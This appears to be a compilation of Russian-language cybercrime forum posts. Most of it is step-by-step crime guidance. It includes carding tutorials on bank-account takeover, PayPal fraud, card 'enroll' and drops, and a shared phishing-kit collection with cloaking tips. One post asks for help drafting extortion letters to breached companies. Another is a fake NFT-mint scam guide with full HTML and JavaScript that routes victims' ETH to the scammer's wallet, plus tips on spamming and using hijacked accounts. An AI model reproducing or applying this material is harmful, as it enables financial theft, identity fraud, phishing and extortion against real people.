webmoneymaker1.narod.ru
winontotalizator.narod.ru
wm-bank.biz
wm-best.by.ru
wmbingo.ru
wmcrack.info
wmcracker.nm.ru
wm-deposit.com
wmdeposit.net.ru
wm-egold.com
wmfond.com
wmgen.boom.ru
wmget.h1.ru
wmhack.vip.su
wmi-bank.com
wminvest.h12.ru
wmmultiplier.h1.ru
wmn.by.ru
wmoney.us
wmoneybank.by.ru
wmreal.narod.ru
wmthief.narod.ru
wmtrust.com
wmvu.5u.com
wmz-bank.com
wmzinvest.biz
wmzinvest.com
wsbank.biz
x-load.cjb.net
x-load2005.narod.ru
xplicitgroup.net
xxl3000.narod.ru
xxxfilm.chat.ru
yandiplom.com
ydarmag.da.ru
zakazdok.boxmail.biz
zakaznn.narod.ru
zawm.com.ua
zebratrade.com
zeron.h15.ru
zigmynd.org
zigmynd.r52.info
zipru.com
www.worldmobi.narod.ru
bix.atspace.comClick to expand...
Источник: blackrunet
если найдёте ещё сайты(подобные этим) просьба постить в тему.
непутать с ЭТОЙ темой.
Автора я ее знаю, скинули мне это в телеграме
![yadi.sk](/proxy.php?image=https%3A%2F%2Fyastatic.net%2Fs3%2Fpsf%2Fdisk- public%2F_%2F2g2fARP6rvC7jZlVDSInCjAxDpF.png&hash=8b1240412df95199c0fc707aab45ca52&return_error=1)
Посмотреть и скачать с Яндекс Диска
![yadi.sk](/proxy.php?image=https%3A%2F%2Fyastatic.net%2Fs3%2Fpsf%2Fdisk- public%2F_%2F5hb_sU044zVfPgNsMKf8pNs2_6H.png&hash=7a8adcf3b9b4977c20c8df73c9c222b3&return_error=1) yadi.sk
Здесь можно скачать слитое обучение кардингу от BlackTime и Plastik которое
продавалось за 80.000 рублей
Еще один слив
Описание
***(Форум) - сообщество профессионалов, работающих в сфере кардинга не один год. Их обучения ценятся доступностью и логической связностью изложенной информации, поэтому даже полный ноль сможет сделать первые шаги в таком непростом теневом ремесле как кардинг.
Ссылка на скачивание:
](https://www.sendspace.com/file/kkh8d8)
Send, Receive, Track & Share Your Big Files with SendSpace file sharing!
www.sendspace.com
Кардинг PayPay саморег
Что нам понадобится:
Настроенная виртуальная машина под USA. Банковский аккаунт Wells Fargo Bank или Suntrust Bank.
SSN/DOB желательно под БА.(Банк. Акк.)
Socks5 под холдера БА.
Запускаем виртуальную машину, как пример Windows 7 Eng язык USA, раскладка клавиатуры USA. Банк. Акк. Wells Fargo амера живущего в Бирмингхеме.
Натягиваем Socks5 под USA, штат, город Бирмингхем.
Идём на wellsfargo.com, логинимся в банк аккаунт. Если накосячили с IP т.е. socks,ssh или vds. Вылетят секретные вопросы. Они очень редко продаются в комплекте с БА.
В общем, зашли на аккаунт. Видим счета, балансы. Идём во вкладку Alerts. Выключаем там все оповещения списание,пополнение и так далее. Отключаем оповещения на email и телефон.
Для лучшего эффекта выжидаем 24 часа.
Полазийте по аккаунту, т.к. все акки веллса выглядят одинаково изучите их как следует.
Найдите скан чека и перепишите от туда Account и Routing numbers.
Они понадобятся нам для привязки Bank Account в Paypal.
Как было описано выше о нужде SSN/DOB. Их лучше пробить под холдера БА. Цена в районе 3-6$ за пробив. Либо пару баксов в сервисе. Пробив в сервисе где-то 40-50% успеха.
И так, мы имеем все необходимые данные. Идём на paypal.com
Жмём на регистрацию, выбираем личный аккаунт. Заполняем необходимые поля, регаем на заранее готовое левое мыло скажем на google или yahoo.
DOB - Дата рождения. Вводим пробитые на холдера данные. SSN так-же вводим его. В этом случае у нас есть шанс получить BML - Bill Me Later. Это кредитные средства предоставляемые Paypal на покупки.
После удачной регистрации аккаунта подтверждаем email. Телефон вписываем заранее подготовленный. (Телефон либо берём в аренду у сервиса, либо покупаем номер самостоятельно, об этом будет отдельная статья).
Далее нас попросят прилинковать BA либо CC. Выбираем Link Bank Account. Пролистываем страницу вниз и нажимаем кнопку перехода к старому интерфейсу Paypal. Это повысит шансы привязки BA инстантом (мгновенно).
Нас попросят ввести Account и Routing номера банк. аккаунта. Далее 2 пути. Paypal разрешит линковку мгновенно - попросит ввести логин и пароль от аккаунта. Либо второй путь вышлет 2 минидепа. Которые придут в течении нескольких суток. Посмотреть их мы так-же сможем войдя в БА. Верифицировать БА в Paypal введинием сумм минидепов.
Верифицировать БА в paypal. Мы закажем на него средства. На первых парах заказывайте не более 300$.
Средства поступают от 3 до 5 рабочих дней. Иногда поступают инстантом.
Если вам повезло и холдер не заметил списание средств с БА. Мы получаем
готовый саморег с балансом.
Для начала нам нужно понять что тут, как и в любом деле, есть своя цепочка и
если просто вбить где-то карту, никто вам товар домой не пришлёт. Как правило
эту цепь реализуют 2 человека тот, кто кардит товар и тот кто его принимает.
Новичку делать одновременно и то и другое почти не реально. Дальше рассмотрим
эти два звена подробней.
Для начала нужно найти магазин, естественно online магазин, в котором мы будем
совершать покупку. Жадничать не стоит, т.к. получить плазменник с кинотеатром
за 10К не получится по многим причинам. Выбираем себе товар типа ноута или
фотика, вобщем ценой ниже 1К -1.5К – для новичков это оптимально IMHO. Дальше
берём саму карту, для покупки её нужно подготовить. Т.к. заказать на адрес её
владельца не выйдет да и смысла нет. Нужно заказывать на дропа. Дроп это
гражданин US, которого развели чтобы он принял посылку и отправил её куда
скажут и за это получил свои 30-50 баксов (+ геморняк на всю жизнь вперед –
ыыы ). Но не будем торопится, предположим у нас есть вот такая карта:
name_on_card=mark s messina
address1=60 plainfeild ave
city=west haven
state=CT
zipcode=06516
country=US
credit_card=4*****0101504612
exp_month=03
exp_year=2008
cvv2=282
надеюь расшифровывать эти поля никому не нада.
Дальше нужно сделать Enroll.
Для Этого нам понадобится SSN (Social Security Number) + DOB (Day of Birthday)
И так. Вы в кардинге, Вы новичок.
Только прошли обучение, или вовсе полный 0 и только начинаете.
Первый вопрос в голове: Что делать, с чего начать?
Гифты, paypal, пикап, прямой вбив сс?
Все вокруг говорят про первые шаги, про слив денег на материал, про сплошные
неудачи.
Все эти вопросы жутко давят Вам на мозг и психику.
Ведь хочется как можно быстрее выйти в профит с минимальными потерями.
Ведь хочется? Хоочется!
)
Так ловите пару пенсионных советов =))
У меня для Вас всего два варианта, два пути.
МОЙ ЛЮБИМЫЙ ENROLL
Да да, именно энролл. Нет ничего проще чем енролл.
Зачем тратить время на егифты, вбивы на разные билл\шип или билл=шип.
Тратиться на дорогой еу мат.
На много проще сделать енролл. Роллку можно:
- вбить на скупа за процент
- вбить на пересыл и продать за больший процент в РУ
- можно просто продать другому вбивале (быстрые деньги)
Какие навыки нужны для зароливания:
- Уметь работать с SSH\Socks
- Пробивать SSN\DOB (и то не обязательно, есть куча пробивщиков)
- Уметь регистрировать почту
У меня на одну роллку уходит 14$.
9$ СС (шоп HTA) из свежей базы + 1$ SSH + 3$ пробив SSN\DOB + примерно 1$ на
комиссии при переводе битка.
Можно снизить расходы, брать СС из старых баз. Так роллка выходит в 6$. Но тут
зависит от шопа, на HTA я доверяю старым базам, валид у них так же на высоте,
главное чтоб нужные сс были
Пробив 3$ это если вы будете пробивать данные КХ сами, если у пробивалы то в среднем 6$
Итого роллка может выйти от 6$ до 17$
Вот она роллка у Вас на руках, что же делать дальше?
- Можно продать ее другому вбивале и получить прибыль на много выше чем Вы в
нее вложили, как минимум в 2 раза, зависит от баланса роллки.
- Вбить на скупа ликвидный товар и получить в среднем 30% от цены, зависит от
стафа.Многие скупы принимают стаф стоимостью от 200$+. Я рекоммендую бить от
1к$+, но если страшно то не менее 500$.
- Вбить на пересыл, а с него на посреда и продать уже как минимум за 50%. Или
в ру и продать за еще больший %.
- Найти заказчика на определенный товар и вбить на его адрес, так же за
хороший процент
Это краткий обзор то что может Вам дать роллка, я упомянул только вещевуху. В дальнейшем роллки можно проводить через различные сервисы для обнала и т.п. (этим я не занимаюсь сразу говорю)
Что бы вы могли прикинуть, сколько можно заработать вбивая роллки на скупа,
приведу Вам пример.
В данный момент я не вбивал больше месяца, но на днях начал вновь потихоньку
работать.
С одной роллки я вбил два ордера, на 1400 и 1600 долларов, на скупа под 30%.
Процент считается от самой низкой цены на товар в прайсграбере. На выходе я
получил около 700$. Одна неделя, одна роллка.
Конечно, не все роллки дадут вбить на такую сумму, или на такое кол-во раз. Но
тем не менее шанс на профит очень высок.
Да, риски то же хорошие. Для успеха нам необходимо:
- Дающий шоп
- Роллка которая как минимум не подохнет, а максимум пропустит нашу транзу.
- Дроп который не кинет
Но, волков бояться - в лес не ходить.
Енролл на много лучше чем спускать материал на набивание руки при различных
способах вбива.
Ах да, СС не всегда зароливаются. Или SSN\DOB неверны, или уже заролены. Вот
такие и будете вбивать в гифты и прочее
PICKUP - ОН ЖЕ ПЕРЕХВАТ
Так же очень хороший способ вбива, на много проще чем энролл.
Одел тунель\сокс\дед и вбил на данные с СС. Все.
Так же как и энролл, вбив на пикап очень благоприятен для фрод системы шопов.
Риски при вбиве на пикап такие же как и при любом другом вбиве. Это и прозвон
и отрисовки. Ну и наверное добавим риск запрета на пикап отправителем, да.
Основной минус по сравнению с роллкой, так это то что Вы не видите баланс купленной СС, а так же не знаете актуальный ли на данный момент адрес у этой СС. Но за то не надо париться с пробивом инфы о КХ, осуществлять процесс зароливания. Купил да вбил.
Единственное что могу посоветовать, так это брать СС из свежих баз.
На примере того же XTA, материал из древних баз имеет очень высокий валид,
очень. Но зачастую у СС из этих баз уже сменен адрес на новый.
Поэтому под пикап такие СС я не рекоммендую брать, а вот под энролл смело,
т.к. адрес при зароливании не нужен.
Но, Вы рисковый кардер, о да) Решили взять СС из старой базы на пикап, но при
вбиве мерч ругнулся на неверный адрес. Не спешите отчаиваться, кардим подписку
на intelius.com и похожие сервисы, и смотрим последний адрес КХ, возможно он и
присвоен этой СС.
Как правило с пикапа выхлоп меньше чем если бить на адреса скупа, надо платить в среднем 100$ за услуги дропа. На выходе сумма меньше.
Но за то по сравнениею с энроллом тут можно взять количеством + если есть 100% дающие шопы то вообще сказка, берем СС из свежих баз и шпарим.
Можно работать с дроп-сервисами, а можно быть более скупым и отладить свою систему приёма паков.
Почтоматы
Автоматизированная станция приёма и выдачи малогабаритных отправлений.
Не нужно взаимодействовать с сотрудниками и т.д. Все что нужно - симка.
Единственный минус - большие паки туда не поместить. Зачастую до 10кг и
меньше.
Почта России
С недавних пор, появилась услуга приёма посылок без паспорта.
Идём на оф. сайт pochta.ru, внизу кликаем на банер "Ускоренное получение".
Варианты:
• Заполнить анкету и принести её на почту с документами.
Лучше найти дропа, чтобы он всё сделал, либо с поддельными документами самому.
• Регистрация через аккаунт ГосУслуг.
По итогу сможешь получать поссылки по коду с смс, либо с пуш-уведомления.
Курьеры
Кто работает с Мистом, знает, что в 95% случаев курьеру похуй на ваш паспорт,
если он связывается по указанному телефону в декларации.
В случае если попросит паспорт, можно спокойно сказать: «Не первый раз
забираю, ни разу не просили, с собой нет. Права тоже не взял». Курьерам впадлу
заморачиваться и с огромной долей вероятности пак отдадут.
Если курьер слишком праведный, на пак всегда можно заказать повторную
доставку. Скорее всего будет смена курьера. Как вариант: сделать
перенаправление на дропа. Благо сервисов по ру и юа хватает.
Делается все через звонок посреду. Отправитель может поменять конечный путь
доставки. Причин великое множество: уехал, заболел, работаю 24 на 7 и т.д.
Дропы
Стоимость приёма посылок в ру\уа 20-50$. Деньги маленькие, а заебов меньше
всего. + в большинства сервисов дропы ручные, а значит проебать пак
практически не реально, только если сервис заведомо скам. Такие ситуации к
сожалению есть и от них не перестраховаться.
Сайт проекта : https://perceptron.ca/phishware
На данный момент на сайте 250+ различных фишинг страниц/китов
Введение:
Пару месяцев назад я начал изучать Go и недавно решил сделать что-то на
практике.
У меня уже была идея сделать scanner/crawler фишинг страниц* и я наконец
взялся за это дело.
*на подобии этого скрипта:
https://github.com/cybercdh/phishfinder
Коротко о сути проекта:
У нас есть список доменов и ссылок которые подозреваются в фишинге. Источники
этих ссылок расписаны на сайте.
Я написал скрипт на го который будет пробовать траверсить эти
урл и искать в них
активные опендиры.
В случае успеха, в списке файлов он ищет файлы с раширением zip и скачивает их
в базу, в тоже время он сохраняет урл пути и название zip файла в отдельную
бд. для того чтоб использовать их в будущих сканах.
Цель публикации:
Целью публикации результат моего проекта является создание еще одного ресурса
который поможет новичкам (и всем кому интересно) изучить реальные кейсы фишинг
страниц/китов и чтоб они могли совершенствовать свои навыки будь то в защите
или атаке.
Надо признать что большинство фишинг китов в моем сборнике не эталонного "качества" но я уверен что этот ресурс может послужить отличной точкой для начала изучений.
Далее можно копать в сторону как обезопасить эти страницы, правильно их прятать, правильно настраивать вебсервера, динамично показывать контент (клоачить), фильтровать посетителей итд.
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2F46cb03dba40a4382efec81995d7f4b8470449c3739a0187fbea56d0a154bd2d6%2Fbluscreenofjeff%2FRed- Team-Infrastructure-Wiki&hash=1bad95ee0a115441da6ea36697a1aa93&return_error=1)
Red Team infrastructure hardening resources ](https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki)
Wiki to collect Red Team infrastructure hardening resources - bluscreenofjeff/Red-Team-Infrastructure-Wiki
github.com
Либо наобарот изучать техники фингерпринта страниц, выявлять паттерны при
использовании различных ресурсов (картинок, css, шрифтов), разрабатывать
системы защиты от и выявления фишинг страниц, находить имейлы скидов итд для
последующих расследований, опять-же смотря какую сторону вы выбрали.
хттпс://twitter.com/JCyberSec/status/1130793084957134848_
Внеси свой вклад:
Все те кто хотят внести свой вклад в этот ресурс могут отправить мне в ПМ свои
страницы/киты по этому шаблону:
-Название
-Ссылка на оригинал
-Комментарий
-Ник/Аноним (если желаете не расскрывать свой ник)
-Ссылка на архив (чтоб я мог скачать и перезалить)
Spoiler: Прочее
_На сайте отписал формальный дисклеймер чтоб не потерять домен.
Исходников самого кравлера в этом топе не будет, пока что стыдно давать код на ревью публике, возможно через пару месяцев я буду готов их выложить, в этом топе будет только результат работы моих скриптов.
На данный момент у меня накопилось очень много файлов, сотни архив файлов, и я буду постепенно их проверять и сортировать, этот процесс не быстрый и порой утомительный.
Я постараюсь хотябы 1 раз в неделю загружать в ресурс новые киты/страницы т.ч добавляйте ссылку в закладки.
Если зайти на сайт с Тор браузера он будет выглядит убого, рекомендую заходить через Chrome или Firefox. Контент на сайте статичный и в нем отсутсвуют трекеры/аналитика._
**Последняя книга из данной серии.
Занимайся хакингом как легенда
(Взламываем планету | Книга 4)**
Описание:
Это история хакера, который во время взлома компании встречает достойный
отпор: машинное обучение, анализ поведения, искусственный интеллект...
Большая часть хакерских инструментов обломаются в подобной агрессивной
среде.
Что делать хакеру, который сталкивается с подобным, под завязку экипированным противником?
Кибербезопасность в лучшем виде
Мы начнем с построенияК6 живучей C&C-инфраструктуры, используя облачные
провайдеры, HTTP Redirector -ы и SSH туннели.
Идея состоит в том, чтобы укрыться за слоем одноразовых машин ,
которые мы сможем обновлять в течение считанных секунд для полного
изменения наших отпечатков.
Далее мы поэтапно настроим фишинговую платформу: фейковый веб-сайт, Postfix- сервер, **DKIM-подписи,SPF **иDMARC.
Искусство проникновения
Вместо того, чтобы напрямую хакнуть нашу цель (оффшорную компанию), мы
нацелимся на одного из их поставщиков, которого мы идентифицируем при помощи
техник OSINT.
Мы соберем пароли с помощью своей фишинговой платформы и воспользуемся
удаленным доступом через Citrix для того, чтобы сделать первый шаг внутрь.
Мы обойдем Applocker и Ограниченный языковой режим в PowerShell, чтобы добиться выполнения кода, затем приступим к разведке и сбору данных поActive Directory.****
Через несколько минут нас выбросят из сети за подозрительную активность.
Искусство эксплуатации
Мы эксплуатируем уязвимость в паттернах паролей , чтобы вернуться обратно
на сервер Citrix. Мы сталкиваемся с MS ATA иQRADAR SIEM.
Пытаемся обойти их, используя различные хакерские приемы, и у нас получается
отключить все новые возможности безопасности Windows Server 2016 (AMSI,
ScriptBlock Logging и так далее).
В процессе того, как мы пытаемся заполучить учетные данные разработчиков,
которые по нашему предположению работают над продуктом, используемым в
оффшорной компании,
мы также сталкиваемся с антивирусом следующего поколения Windows (ATP).
Завершаем работу внедрением бэкдора в бухгалтерское программное обеспечение таким образом, чтобы обойти большую часть тестов безопасности и функционала.
Забудь про тестирование на проникновение, время вступить в Red team
Наш бэкдор приводит в действие бесфайловую малварь , с помощью которой мы
получаем доступ во внутреннюю сеть офшорной компании.
После чего отправляемся на легкую прогулку для получения привилегий
администратора домена и доступа к персональным данным тысяч фиктивных компаний
и их конечных владельцев.
В книге предоставляются и тщательно объясняются все используемые кастомные пейлоады для атак.
Для чтения книги требуется владеть знаниями о базовых принципах компьютерной
безопасности, включая: NTLM, pass-the-hash, Windows Active Directory, объекты
групповых политик и так далее.
Если вы слабо владеете данными концепциями, я настоятельно рекомендую вам
предварительно прочитать предыдущие книги .
Spoiler: Спойлер: Отказ от ответственности
Примеры в этой книге полностью вымышлены. Описываемые инструменты и техники имеют открытый исходный код, а следовательно - доступны публично. Специалисты по безопасности и пентестеры регулярно используют их в своей работе, также как и атакующие. Если вы стали жертвой компьютерного преступления и обнаружили в этой книге демонстрацию техник или инструментов, то это никоим образом не означает, что автору этой книги и переводчику можно инкриминировать любую связь с компьютерным преступлением, содержимое этой книги не дает никаких оснований полагать, что есть какая-либо связь между автором книги/переводчиком и преступниками.
Любые действия и/или деятельность, связанные с материалом, содержащимся в этой книге, находятся целиком под вашей ответственностью. Неправильное использование информации из этой книги может стать результатом обвинений в совершении уголовного правонарушения в адрес соответствующих лиц. Автор и переводчик не несут никакой ответственности за деяния лиц, использующих информацию из этой книги в преступных целях.
Эта книга не призывает заниматься хакерством, взломом программного обеспечения и/или пиратством. Вся информация, представленная в книге, предназначена исключительно в образовательных целях. Она призвана помочь организациям защитить свои сети от атакующих, а следователям собрать цифровые улики во время расследования инцидентов.
Совершение любых попыток по хакингу/взлому систем или тестирование систем на проникновение должно сопровождаться письменным разрешением от владельцев данных систем.
Оригинал продажника:
Hidden content for authorized users.
https://www.amazon.com/How-Hack-Like-LEGEND-secretive-ebook/dp/B07C1GPJ19/
Скачать:
[CLIKE]
dB5KfjjNgIZJLWN_M0Zd8SsXyVmT9z4oY)
MEGA provides free cloud storage with convenient and powerful always-on privacy. Claim your free 50GB now
mega.nz
[/CLIKE]
На безвозмездной основе буду скидывать сюда исходники фиш ( сс, крипта) и парочка лайв панелей. кто возьмет благодарочку оставьте)))
Последние 7 лет искал компании, которые платят за уязвимости. Ломал, писал отчёты, получал свои бабки. В последнее время начали компании кидать, обещали изначально заплатить, если будут критикал баги, но в итоге кидают. Думал ситуация будет не частой, но это начало повторяться не раз. Меня это просто сломало и я перешёл на тёмную сторону. Я начал ломать сайты, в основном сливать бд и требовать выкуп. Из 5 компаний платят двое-трое. Хочу довести письмо в компанию до ума, чтобы платили все 100%. Кто подскажет, как составить хитро письмо, буду весьма признателен, отблагодарю финансово, если письмо выстрелит...
Приветствую всех, кто только начинает развиваться в этой отрасли и тех, кто
это уже всё прожевал.
**В данном манауле я расскажу всё об фейк минтах от А до Я и предоставлю соурс
код(Код в общем доступе).
Что для этого нам необходимо:
-Минимальное понимание программирования
-Капелька хитрости и ума
-Немного ресурсов
-20$ на хост и домен~**
Меньше воды, больше дела, сразу приступим к делу
И так, что такое NFT я думаю уже все знают, а вот что такое минт?
Минт - это процесс продажи NFT коллекции. Дату минта обозначают сами
разработчики.
Минт может быть как и свободного доступа(Т.е. для любого желающего), так и
закрытого доступа - только для тех, кто попал в WL(WhiteList / Белый лист)
Способов попасть в белый лист большое количество, но тема не об этом, но если
будет интересно - расскажу)
В любом случае, для нас это не важно, ведь мы собираемся делать фейковый минт,
а не покупать NFT на официальном ресурсе.
И так, вот настал момент, мы решились создать свой первый скам-проект, остановились на выборе - фейк минт, а откуда нам брать траффик для фейк минта и как его распространять? Или где нам найти, какой проект в скором времени запустится, чтобы сделать под него фейк? Какая прибыль? И как работает этот фейк? Сейчас разберем всё по полочкам.
Как работает фейк:
Работа фейк минта очень проста)
Мы запускаем сайт с использованием Web3(не пугаемся, расскажу), на котором
будет идти якобы продажа NFT, пользователь покупает NFT, но бабки летят не в
проект NFT-Коллекции, а на ваш кошелек.
Вот мы разобрались, а под что проект то делать?
Где найти проект под который сделать фейк:
Есть различное количество ресурсов, на которых происходят анонсы, продвигаются
и рекламируются будущие NFT-коллекции.
Я приведу один пример, а так, ресурсы в общем доступе в поисковиках)
Узнайте о коллекциях NFT, которые скоро будут выставлены на торги, включая день и время их размещения, а также на каком блокчейне они будут размещены.
![coinmarketcap.com](/proxy.php?image=https%3A%2F%2Fcoinmarketcap.com%2Fapple- touch-icon.png&hash=8b5b4245266e533da47fb42ff9b2142b&return_error=1) coinmarketcap.com
Что мы видим, большое количество предстоящих продаж, но как же выбрать, куда
залетать?
Придётся немного постараться, чтобы найти хороший проект, ибо их не так уж и
много, но по сути говоря - можно залететь в большинство и получить какую
никакую скамнутую монету.
Но если желание есть подобрать более хороший проект, то посоветую переходить
на ресурсы коллекций и смотреть активность, смотреть количество участников,
есть ли WL(Если есть, то проект более серьезный)
Ладно, хорошо, но а есть ли смысл вообще заморачиваться? Какая прибыль то?
Прибыль с фейка:
Доходность конечно же не фиксированная, но и мы тут не за зарплату пришли
РАБотать ))
Все в ваших руках, абсолютно полностью в ваших руках, за день можно собрать и
ничего, а можно и залутать спокойно >1eth
Пример дохода за запуск одного минта:
Вроде и не так много, но и не
мало
Ладно, нам это подходит, для старта пойдёт, но как распространять?
Траффик и распространение:
Тут уже открывается огромное количество дорог
Можно проспамить по участникам дискорд канала NFT-Коллекции
Также можно проспамить по Твиттер подписчикам NFT-Коллекции
(Обязательно делаем ник и аватарку под NFT-Коллекцию)
Вариаций много и предела творческого подхода в этом
нет
И так, вот мы уже подобрали проект, собрали все ресурсы для распространения, подходим к делу. Предстоящая продажа NFT-Коллекции от XSS.IS стартует завтра. Упускать такой возможности нельзя.
Вот- вот будет стартовать проект от XSS.IS, нужно быстро что-то предпринять
и запустить фейк-минт, но все кодеры заняты?
Не проблема, сейчас покажу на пальцах как за пару часов запустить проект и
предоставлю соурс код.
Для старта нужно установить любой редактор кода, я лично использую Visual
Studio Code.
Далее для понимания немного информации на простом языке:
CSS - Язык стилей, с помощью него закладывается основа дизайна сайта
HTML - Разметка сайта, проще говоря - указывает сайту где что будет
находиться)
JS - Скрипты для взаимодействия с сайтом))
Выгружаем архив, что я приложил, открываем файлы редактором кода
Сам сайт выглядит так:
Разбирать полностью код из соурса мы не станем, ибо это не столь важно и муторно, но поехали разберем по файлам важную структуру для редактирования:
Index.html
Здесь мы видим структуру сайта и подключаемые скрипты
Из важных подключаемых скриптов Web3.js и Script.js
Web3 нам необходим для взаимодействия с метамаском и сетью ERC-20
Script.js скрипт с помощью которого мы соединяем наш сайт с Web3
Также мы наблюдаем в index.html данный код:
HTML:Copy to clipboard
<div id="payment-header">
<div id="payment-header-text">
<h3 style="text-align:center" id="titleH4"> XSS.IS</h3> <!-- Auto edit (config in index.js) -->
<h3 style="text-align:center">FREE Mint LIVE!</h3>
<p style="text-align:center" id="totalSupply" class="pt-1.5 italic-grey">Total supply: 100 NFTs</p>
<!-- Auto edit (config in index.js) -->
</div>
</div>
<div id="payment-info">
<img src="xss.PNG" class="image" height="100px" id="price-img">
<div id="payment-info-text">
<p>Price Per NFT</p>
<p class="title"><a id="nftPrice">0.03</a> ETH + gas</p>
</div>
</div>
[/SIZE][/SIZE][/SIZE][/SIZE][/SIZE][/SIZE][/SIZE][/SIZE][/SIZE][/SIZE][/SIZE][/SIZE][/SIZE][/SIZE]
[SIZE=5][SIZE=5][SIZE=5][SIZE=5][SIZE=5][SIZE=5][SIZE=5][SIZE=5][SIZE=5][SIZE=5][SIZE=5][SIZE=5][SIZE=5][SIZE=5] <div class="flex items-center justify-center space-x-4 mt-5">
<div class="w-100 h-12 flex flex-col items-center justify-center border border-brand rounded">
<div id="ape-number" >
<div class="calcs" >
<form class="div" oninput="result.value=(a.value * price).toFixed(2)" style="display: flex;">
<div class="down_arrow" id="addCount" style="font-size: 30px;" > - </div>
<input id="inputor" name="a" class="nftsNumber eth_input text-white text-center leading-3 -mt-1 placeholder-white text-lg md:text-xl lg:text-3xl font-semibold w-12 h-12 bg-transparent focus-within:outline-none" type="number" min="1" pattern="[A-z0-9]{2,50}" max="5"
placeholder="1" value="1" style="background-color: #00000000;;text-align:center;width:30px;border-color: #00000000;margin-left:15px;"><div class="up_arrow" id="remCount" style="font-size: 30px;font-weight: 400;"> + </div></div><h5 id="maxNumber" style="text-align: right;margin-bottom:5px ;">5 Max</h5>
</div></div>
</div>
<p class="text-alert text-sm font-semibold pt-3 leading-4 pb-4"></p>
<div id="ape-total">
<p class="mt-3"><span class="total text-white text-base md:text-lg lg:text-xl">Total:</span>
<output id="price" name="price" class="actual_price ml-1 text-lg md:text-xl lg:text-3xl text-brand font-semibold">0.03</output>
</form>
В этом коде мы заменяем название, колличество, стоимость и картинки под нужный нам проект
**Script.js
JavaScript:Copy to clipboard
[/B]
const netURL = 'https://mainnet.infura.io/v3/30ea4......';
const ADDRESS = '0x00000000000000000000';
const web3 = window.Web3
const ethereum = window.ethereum
let accounts
let price = 0.03
const input = document.querySelector(".eth_input")
const button = document.querySelector(".metamask_content-btn")
const title = document.querySelector(".metamask_content-title")
const priceDisplay = document.querySelector("#price")
const Web3 = new web3(netURL)
window.addEventListener("load", () => {
button.disabled = false
button.classList.remove('hidden');
if (ethereum.selectedAddress) {
document.querySelector(".container_link_metamask_install-btn").style.display = "none"
document.querySelector(".container_metamask_content-btn").style.display = "flex"
button.innerHTML = "Mint now"
input.disabled = false
title.innerHTML = "MetaMask connected"
}
else if (ethereum.isMetaMask) {
document.querySelector(".container_link_metamask_install-btn").style.display = "none"
document.querySelector(".container_metamask_content-btn").style.display = "flex"
title.innerHTML = "MetaMask installed"
input.disabled = false
}
})
const getAccount = async () => {
accounts = await ethereum.request({ method: 'eth_requestAccounts' });
console.log(accounts)
if (window.ethereum.chainId == "0x1") console.log("Already connected to ethereum mainnet...")
else {
try {
await ethereum.request({
method: 'wallet_switchEthereumChain',
params: [{chainId: '0x1'}],
});
} catch (switchError) {
// This error code indicates that the chain has not been added to MetaMask.
if (error.code === 4902) {
try {
await ethereum.request({
method: 'wallet_addEthereumChain',
params: [{
chainId: '0x1',
rpcUrl: netURL
}],
});
} catch (addError) {
// handle "add" error
}
}
}
}
}
const sendTransaction = async () => {
price = +input.value * 0.03
const priceToWei = (price * 1e18).toString(16)
ethereum.request({
method: 'eth_sendTransaction',
params: [
{
from: accounts[0],
to: ADDRESS,
value: priceToWei,
},
],
})
.then((txHash) => console.log(txHash))
.catch((error) => console.error);
};
input.addEventListener("input", () => {
if (+input.value < 1) button.disabled = true
else if (+input.value >= 1) button.disabled = false
price = +input.value * 0.03
if (+input.value >= 1) priceDisplay.innerText = price.toFixed(2)
//else if(input.value < 1) input.value =+ "1"
else priceDisplay.innerText = "0"
})
button.addEventListener("click", async () => {
if (!ethereum.selectedAddress) {
await getAccount()
button.innerHTML = "Mint now"
title.innerHTML = "MetaMask connected"
} else {
await getAccount()
await sendTransaction()
}
})
document.querySelector(".up_arrow").addEventListener("click", () => {
input.value = +input.value + 1
event = new Event("input")
input.dispatchEvent(event)
})
document.querySelector(".down_arrow").addEventListener("click", () => {
input.value = +input.value - 1
event = new Event("input")
input.dispatchEvent(event)
})
[B]
**В этом скрипте происходит взаимодействие с сайтом, сейчас расскажу что к чему
В первой строке мы подключаемся к Infura, регистрируемся, создаем проект,
берем айди и впуливаем в эту строчку
Во второй строке заместо 0x00000000.... указываем свой кошелек
В строчке let price = 0.03 указываем стоимость NFT(Заместо 0.03)
И также везде в этом коде, где указанно 0.03 заменяем на свою цену
Функция getAccount запрашивает подключение для пользователя к кошельку
Функция sendTransaction отправляет транзакцию
Евент click создает функцию кнопки для подключения и отправки транзакции
.up_arrow и .down_arrow создают возможность взаимодействия с кнопками + и
-
**Далее сохраняем весь наш проект, загружаем на хостинг и начинаем распространять
Сейчас это конечно же не самая актуальная версия для скама крипты, но есть
большие шансы занять свою нишу. С каждым днём становится все больше
конкурентов, с каждым днём выходят новые обновления по блокировке спама на
подобные фейк-проекты. Но, я уверен, что если найти свой собственный источник
траффика можно на этом получать хорошие деньги. Также можно использовать
данный скрипт не только для фейк минтов, но и для других проектов. Как пример:
крипто-боксы(открытие кейсов с подарками), различные фейк-продажи, фейк-биржи,
аукционы автомобилей за крипту. И также распространять можно абсолютно любыми
методами. Можно придумать абсолютно что угодно и использовать это в своих(и не
только) целях.
Не обязательно даже для чёрной работы это использовать, может у вас свой белый
проект и вы бы хотели добавить оплату в крипте, пожалуйста, этот скрипт
отлично подойдет, только нужно немного подредактировать)** **Запущенных фейк-
минтов не сосчитать, но приведу пару примеров))
Как-то в логе со стиллера мне попался неплохой ютуб и телеграмм-канал по
крипто-тематике, не особо популярные, но все же. Ну я сразу кубы кидать, что
мне с этим можно сделать. Не долго думая запустил Евент-тикет, там где покупая
билетик ты получаешь огромный шанс приумножить свой капитал, накидал несколько
страничек для сайтика, на одном из них саму покупку билетов по 0.1 ETH и внизу
шансы разных выйгрышей и количество уже принявших участников(Динамическое
изменение было), что в соотношении давало огромные шансы на большую победу
Сделал подобие трейлера и закинул на ютубчик и в телеграмм-канал, в тот момент
для меня это был огромный заработок, но собрал 4k$
И второй пример немного даже забавный)
Также в логе, но совсем другое. Залетел мне ютуб канал, инстаграм, твиттер
одного очень популярного блогера-гея)) Ну и что, мне сразу прилетела в голову
идея. ПОДДЕРЖКА И РАЗВИТИЕ ЛГБТ СООБЩЕСТВА)))
Когда люди, с которыми я работал увидели это - посмеялись, но залетело неплохо
Также собрал сайт, подготовил дизайн для постов под инстаграм и твиттер, ютуб
не стал трогать, отдал на стрим. Подождал позднего вечера по RU времени(т.к.
это самый пик актива в US и EU) и залил посты
